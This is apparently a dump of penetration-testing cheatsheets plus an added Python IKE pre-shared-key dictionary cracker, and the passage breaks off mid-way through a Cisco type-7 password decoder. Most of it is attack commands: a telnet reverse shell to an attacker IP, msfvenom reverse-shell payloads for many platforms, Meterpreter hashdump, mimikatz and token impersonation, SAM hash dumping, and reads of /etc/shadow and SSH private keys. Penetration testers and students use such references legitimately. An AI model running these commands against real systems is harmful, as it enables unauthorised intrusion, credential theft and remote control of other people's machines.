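What psk-crack is actually computing for each candidate, as an added example (Python, not ike-scan's or psk-crack's own code). For pre-shared-key authentication RFC 2409 defines SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf = HMAC using the negotiated hash; every input except the PSK travels in clear in aggressive mode, which is why the hash can be attacked offline. The block assumes the colon-separated hex layout ike-scan writes with -P (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r); the sample line it cracks is constructed locally from a known PSK, not a real capture.

```python
"""Dictionary attack on an IKE aggressive-mode PSK hash (the psk-crack computation).

Added example, not part of ike-scan or psk-crack. Usage against a real file:
python3 ikepsk.py 192-168-207-134key /path/to/dictionary
"""
import hmac
import os
import sys

# Field order of one ike-scan -P line (assumed from the psk-crack file format).
FIELDS = ('g_xr', 'g_xi', 'cky_r', 'cky_i', 'sai_b', 'idir_b', 'ni_b', 'nr_b', 'hash_r')


def parse_psk_line(line):
    """Split one ike-scan -P line into {field: bytes}."""
    values = [bytes.fromhex(v) for v in line.strip().split(':')]
    if len(values) != len(FIELDS):
        raise ValueError('expected %d fields, got %d' % (len(FIELDS), len(values)))
    return dict(zip(FIELDS, values))


def hash_r(psk, p, digest):
    """HASH_R (RFC 2409, PSK authentication) for candidate `psk` (bytes).

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    """
    skeyid = hmac.new(psk, p['ni_b'] + p['nr_b'], digest).digest()
    msg = p['g_xr'] + p['g_xi'] + p['cky_r'] + p['cky_i'] + p['sai_b'] + p['idir_b']
    return hmac.new(skeyid, msg, digest).digest()


def crack(line, wordlist):
    """Return the first word whose HASH_R matches the captured one, else None."""
    p = parse_psk_line(line)
    # The captured hash length identifies the prf: 16 bytes = HMAC-MD5, 20 = HMAC-SHA1.
    digest = {16: 'md5', 20: 'sha1'}[len(p['hash_r'])]
    for word in wordlist:
        if hmac.compare_digest(hash_r(word.encode(), p, digest), p['hash_r']):
            return word
    return None


def make_sample(psk, digest='md5'):
    """Construct a psk-crack style line for a known PSK (test data, not a capture).

    Sizes follow the handshake in the cheatsheet: group 2 DH values are 128 bytes,
    cookies 8 bytes, nonces 20 bytes. The SA body content does not affect the
    check, so it is random here.
    """
    p = {
        'g_xr': os.urandom(128), 'g_xi': os.urandom(128),
        'cky_r': os.urandom(8), 'cky_i': os.urandom(8),
        'sai_b': os.urandom(40),
        # IDir payload body: ID type 1 (ID_IPV4_ADDR), protocol/port 0, then the address.
        'idir_b': bytes([1, 0, 0, 0]) + bytes([192, 168, 207, 134]),
        'ni_b': os.urandom(20), 'nr_b': os.urandom(20),
    }
    p['hash_r'] = hash_r(psk.encode(), p, digest)
    return ':'.join(p[f].hex() for f in FIELDS)


if __name__ == '__main__':
    with open(sys.argv[1]) as f, open(sys.argv[2], errors='ignore') as words:
        found = crack(f.readline(), (w.rstrip('\n') for w in words))
        print('PSK: %s' % found if found else 'no match')
```

Each candidate costs two HMACs, which is why psk-crack manages hundreds of thousands of iterations per second; the defence is not a longer hash but main mode (or, better, certificate or EAP authentication) so that HASH_R is never sent in the clear.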
---------------------------------------------------------------------------------------------------------------------------------- 49 | 50 | Dictionary attack: 51 | 52 | $psk-crack -d /path/to/dictionary 192-168-207-134key 53 | Running in dictionary cracking mode 54 | 55 | no match found for MD5 hash 5c178d[SNIP] 56 | Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) 57 | 58 | ---------------------------------------------------------------------------------------------------------------------------------- 59 | 60 | References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html -------------------------------------------------------------------------------- /Cheatsheet_LinuxPrivilegeEsc.txt: -------------------------------------------------------------------------------- 1 | Enumeration is the key. 2 | (Linux) privilege escalation is all about: 3 | Collect - Enumeration, more enumeration and some more enumeration. 4 | Process - Sort through data, analyse and prioritisation. 5 | Search - Know what to search for and where to find the exploit code. 6 | Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". 7 | Try - Get ready for (lots of) trial and error. 8 | 9 | Operating System 10 | What's the distribution type? What version? 11 | cat /etc/issue 12 | cat /etc/*-release 13 | cat /etc/lsb-release 14 | cat /etc/redhat-release 15 | 16 | 17 | What's the Kernel version? Is it 64-bit? 18 | cat /proc/version 19 | uname -a 20 | uname -mrs 21 | rpm -q kernel 22 | dmesg | grep Linux 23 | ls /boot | grep vmlinuz- 24 | 25 | 26 | What can be learnt from the environmental variables? 27 | cat /etc/profile 28 | cat /etc/bashrc 29 | cat ~/.bash_profile 30 | cat ~/.bashrc 31 | cat ~/.bash_logout 32 | env 33 | set 34 | 35 | 36 | Is there a printer? 37 | lpstat -a 38 | 39 | 40 | Applications & Services 41 | What services are running? 
Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services


Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root


What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/


Are any of the service settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.cnf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*r.*/'


What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla (single quotes: the shell must not expand $password)


Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname


What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w


What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee


Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump 'tcp and dst host [ip] and dst port [port]'
tcpdump 'tcp and ((dst host 192.168.1.7 and dst port 80) or (dst host 10.2.2.222 and dst port 21))'


Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444   # Attacker. Input (commands)
nc -lvp 4445   # Attacker. Output (results)
telnet [attacker's ip] 4444 | /bin/sh | telnet [attacker's ip] 4445   # On the target system. Use the attacker's IP!


Is port forwarding possible?
Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [listen port] -r [remote port] -s [outbound source port] [remote host]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [listen port]:[remote ip]:[remote port] [user]@[ssh host]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7   # Local forward: your 8080 -> port 80 on 192.168.1.7
ssh -R 8080:127.0.0.1:80 root@192.168.1.7   # Remote forward: 8080 on 192.168.1.7 -> port 80 on your box

# mknod backpipe p ; nc -l -p [listen port] < backpipe | nc [remote IP] [remote port] > backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 > backpipe   # Port relay
mknod backpipe p ; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe   # Proxy (8080 to 80), both directions logged to inflow/outflow
mknod backpipe p ; nc -l -p 8080 < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe &   # Proxy monitor (8080 to 80), backgrounded


Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig


Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cut -d: -f1 /etc/passwd   # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l


What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/


Anything "interesting" in the home directory(ies)? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/


Are there any passwords in scripts, databases, configuration files or log files?
Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


What has the user been doing? Are there any passwords in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history


What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


File Systems
Which configuration files can be written to in /etc/? Able to reconfigure a service?
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.*w.*/'   # Anyone
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^..w/'   # Owner
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /^.....w/'   # Group
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/'   # Other

find /etc/ -readable -type f 2>/dev/null   # Readable by the current user
find /etc/ -maxdepth 1 -readable -type f 2>/dev/null   # Readable by the current user, top level only


What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases


Any settings/files (hidden) on the website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


Is there anything in the log file(s)? (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp


If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i


How are file-systems mounted?
mount
df -h


Are there any unmounted file-systems?
cat /etc/fstab


What "Advanced Linux File Permissions" are used? Sticky bits, SUID & SGID
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null   # SGID (chmod 2000) - runs as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null   # SUID (chmod 4000) - runs as the owner, not the user who started it

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SGID or SUID (the parentheses matter: -o binds looser than the implied -a)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done   # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)

# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null


Where can files be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null   # folders writeable by the current user
find / -perm -222 -type d 2>/dev/null   # world-writeable folders
find / -perm -o+w -type d 2>/dev/null   # world-writeable folders

find / -perm -o+x -type d 2>/dev/null   # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders


Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner/group


Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name 'perl*'
find / -name 'python*'
find / -name 'gcc*'
find / -name cc


How can files be uploaded?
find / -name wget
find / -name 'nc*'
find / -name 'netcat*'
find / -name 'tftp*'
find / -name ftp


Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com


Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]


(Quick) "Common" exploits. Warning: pre-compiled binary files. Use at your own risk.
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
--------------------------------------------------------------------------------
/Cheatsheet_LocalSamDump.txt:
--------------------------------------------------------------------------------
fdisk -l

mount -t ntfs /dev/sda1 /mnt

df -k

cd /mnt
ls
cd WINDOWS/system32/config

ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt --format=NT --users=Administrator   # older jumbo builds call the format nt2
cd /root/.john
ls -l
cat john.pot
--------------------------------------------------------------------------------
/Cheatsheet_MSFPostExploitation.txt:
--------------------------------------------------------------------------------
[+] Meterpreter Shell

meterpreter > sysinfo

meterpreter > getuid

meterpreter > getsystem

meterpreter > hashdump

meterpreter > load mimikatz   # ('use mimikatz' on older versions)

    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter > wdigest

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token SERV-2K3\\Administrator
meterpreter > execute -f cmd.exe -i -t
--------------------------------------------------------------------------------
/Cheatsheet_Metasploit.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jivoi/Cheatsheets/9bc195d4cc05728c4ee29312124ac57ed54bb160/Cheatsheet_Metasploit.pdf
--------------------------------------------------------------------------------
/Cheatsheet_MetasploitPayloads.txt:
--------------------------------------------------------------------------------
[+] Creating Metasploit Payloads

List payloads
msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f macho > shell.macho


Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php   # the raw output has no opening <?php tag; this prepends it

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f war > shell.war


Scripting Payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=[IP] LPORT=[PORT] -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=[IP] LPORT=[PORT] -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=[IP] LPORT=[PORT] -f raw > shell.pl


Shellcode

For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that can be cut and pasted into your exploit in that language.

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f [language]

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f [language]

Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f [language]


Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD [payload]
set LHOST [IP]
set LPORT [PORT]
set ExitOnSession false
exploit -j -z

Once the required values are completed, the following command will execute your handler: 'msfconsole -L -r [handler.rc]'
--------------------------------------------------------------------------------
/Cheatsheet_MobileAppTesting.txt:
--------------------------------------------------------------------------------
http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources

------------------------------------------ Mobile Application Test Notes (iPhone)


Prepping Device and Application:

[+] Jailbreak iPhone/iPad - Greenpois0n / Absinthe 2.04
[+] Enable SSH on the iPhone/iPad
[+] Install iFunbox to install the application (http://www.i-funbox.com)
[+] Connect the device to the lab wireless network
[+] Add web proxy settings - IP address of the attacking machine, port 8080
[+] Ensure the connection and SSH are working


Prepping Burp Suite:

[+] Open Burp Suite and navigate to Proxy->Options,
[-] Edit proxy listeners - enter 'port' as 8080, disable 'loopback only' and select 'support invisible'.

[+] Download and install the Burp CA certificate (.crt) onto the iPad.

Mobile Application Penetration Testing:

[+] Browse the following directory for insecure storage
[-] /private/var/mobile/applications/


Notes:

[+] Application file type - x.ipa

[+] Easy way:

- Place the attacking machine and the Apple device on a wireless network, with the app installed.
- Email Burp's .cer to the Apple device and install it.
- Start Burp and disable the firewall on the listening machine.
- Change the proxy settings on the Apple device to point to the listening Burp machine/port.


------------------------------------------ Mobile Application Test Notes (Android)

[+] Create a virtual device:
[-] android avd

[+] Start the emulator:
[-] emulator -avd testavd

[+] Install the application:
[-] adb install [app.apk]

[+] Open Burp Suite and navigate to Proxy->Options,
[-] Edit proxy listeners - enter 'port' as 8080, disable 'loopback only' and select 'support invisible'.

[+] Start the emulator and proxy:
[-] emulator -avd testavd -http-proxy http://localhost:8080

[+] Download and install the Burp certificate (.crt) onto the emulator using adb push.


Notes:

[+] Application file type - x.apk

Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp

http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
--------------------------------------------------------------------------------
/Cheatsheet_Networking.txt:
--------------------------------------------------------------------------------
Useful Networking Cheatsheet
----------------------------

[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux

# Install bridge-utils
sudo apt-get install bridge-utils

# Disable network-manager + firewall

# Configuration

ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0   # only if the bridge itself needs an address; a silent tap does not

sudo tcpdump -i br0
--------------------------------------------------------------------------------
/Cheatsheet_OWASPCheckList.txt:
--------------------------------------------------------------------------------
The Checklist

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
Perform Web Application Fingerprinting
Identify technologies used
Identify user roles
Identify application entry points
Identify client-side code
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
Identify co-hosted and related applications
Identify all hostnames and ports
Identify third-party hosted content

[+] Configuration Management

Check for commonly used application and administrative URLs
Check for old, backup and unreferenced files
Check HTTP methods supported and Cross Site Tracing (XST)
Test file extensions handling
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
Test for policies (e.g. Flash, Silverlight, robots)
Test for non-production data in live environment, and vice-versa
Check for sensitive data in client-side code (e.g. API keys, credentials)

[+] Secure Transmission

Check SSL Version, Algorithms, Key length
Check for Digital Certificate Validity (Duration, Signature and CN)
Check credentials only delivered over HTTPS
Check that the login form is delivered over HTTPS
Check session tokens only delivered over HTTPS
Check if HTTP Strict Transport Security (HSTS) in use

[+] Authentication

Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO

[+] Session Management

Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
Check session tokens for cookie flags (httpOnly and secure)
Check session cookie scope (path and domain)
Check session cookie duration (expires and max-age)
Check session termination after a maximum lifetime
Check session termination after relative timeout
Check session termination after logout
Test to see if users can have multiple simultaneous sessions
Test session cookies for randomness
Confirm that new session tokens are issued on login, role change and logout
Test for consistent session management across applications with shared session management
Test for session puzzling
Test for CSRF and clickjacking

[+] Authorization

Test for path traversal
Test for bypassing authorization schema
Test for vertical Access control problems (a.k.a. Privilege Escalation)
Test for horizontal Access control problems (between two users at the same privilege level)
Test for missing authorization

[+] Data Validation

Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie

[+] Denial of Service

Test for anti-automation
Test for account lockout
Test for HTTP protocol DoS
Test for SQL wildcard DoS

[+] Business Logic

Test for feature misuse
Test for lack of non-repudiation
Test for trust relationships
Test for integrity of data
Test segregation of duties

[+] Cryptography

Check if data which should be encrypted is not
Check for wrong algorithms usage depending on context
Check for weak algorithms usage
Check for proper use of salting
Check for randomness functions

[+] Risky Functionality - File Uploads

Test that acceptable file types are whitelisted
Test that file size limits, upload frequency and total file counts are defined and are enforced
Test that file contents match the defined file type
Test that all file uploads have Anti-Virus scanning in-place.
Test that unsafe filenames are sanitised
Test that uploaded files are not directly accessible within the web root
Test that uploaded files are not served on the same hostname/port
Test that files and other media are integrated with the authentication and authorisation schemas

[+] Risky Functionality - Card Payment

Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF

[+] HTML 5

Test Web Messaging
Test for Web Storage SQL injection
Check CORS implementation
Check Offline Web Application
--------------------------------------------------------------------------------
/Cheatsheet_Oracle.txt:
--------------------------------------------------------------------------------
Oracle Penetration Testing
--------------------------

Tools within Kali:

oscanner
root@kali:~# oscanner -s 192.168.1.15 -P 1040

sidguess
root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt

tnscmd10g
root@kali:~# tnscmd10g version -h 192.168.1.20

Nmap
nmap -p 1521 -A 192.168.15.205

Nmap NSE scripts
Metasploit auxiliaries
--------------------------------------------------------------------------------
/Cheatsheet_PenTesting.txt:
--------------------------------------------------------------------------------
-------------------------------------------------------------------------- Reminders

LOG EVERYTHING!

Metasploit - spool /home/[user]/.msf3/logs/console.log
Save the contents from each terminal!
Linux - script myoutput.txt   # Type exit to stop

[+] Disable network-manager
service network-manager stop

[+] Set IP address
ifconfig eth0 192.168.50.12/24

[+] Set default gateway
route add default gw 192.168.50.9

[+] Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf

[+] Show routing table
Windows - route print
Linux - route -n

[+] Add static route
Linux - route add -net 192.168.100.0/24 gw 192.168.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9

[+] Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0

[+] Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

[+] Python shell
python -c 'import pty;pty.spawn("/bin/bash")'

-------------------------------------------------------------------------- Internet Host/Network Enumeration

[+] WHOIS querying
whois www.domain.com

[+] Resolve an IP using dig
dig @8.8.8.8 securitymuppets.com

[+] Find mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx

[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any

[+] Zone transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup, then at its prompt: ls -d domain.com.local

[+] Fierce
fierce -dns [domain] -file [output file]
fierce -dns [domain] -dnsserver [server]
fierce -range [ip range] -dnsserver [server]
fierce -dns [domain] -wordlist [wordlist]

-------------------------------------------------------------------------- IP Network scanning

[+] ARP scan
arp-scan 192.168.50.8/28 -I eth0

[+] NMAP scans

[+] Nmap ping scan
sudo nmap -sn -oA nmap_pingscan 192.168.100.0/24   # add -PE to probe with ICMP echo only

[+] Nmap SYN/top 100 ports scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/version all-port scan - ## Main scan
sudo nmap -sV -Pn -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/version no-ping all-port scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP all-port scan - ## Main scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/fast scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap top 1000 port UDP scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1   # -s source port, -p destination port, -S set SYN
Open = flags SA
Closed = flags RA
Blocked = ICMP unreachable
Dropped = no response

[+] Source port scanning
nmap -g [port] ...   # try 53 (DNS), 67 (DHCP) or 88 (Kerberos): naive filters allow these source ports through
Source port spoofing also doesn't work for OS detection.

[+] Speed settings
-n                Disable DNS resolution
-sS               TCP SYN (stealth) scan
-Pn               Disable host discovery
-T5               Insane timing template
--min-rate 1000   1000 packets per second
--max-retries 0   Disable retransmission of timed-out probes

-------------------------------------------------------------------------- Cisco/Networking Commands

? - Help
> - User mode
# - Privileged mode
router(config)# - Global configuration mode

enable secret is more secure than enable password.

For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
the enable secret has been hashed with salted MD5-crypt (type 5, one-way), whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
the password has been obscured with the weak, reversible type 7 algorithm.
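How weak "reversible" is, as an added example (not from the page): type 7 is a fixed-key XOR, with the two leading decimal digits giving the offset into a constant key string that every IOS image shares. The decoder below recovers the page's own `username jdoe` example; the constructed config fragment and its `line vty` credential are mine, and `audit_config` is a helper I wrote to walk a saved config and separate the types that need cracking from the ones that just need decoding.

```python
"""Cisco IOS 'password 7' decoder and a small config auditor.

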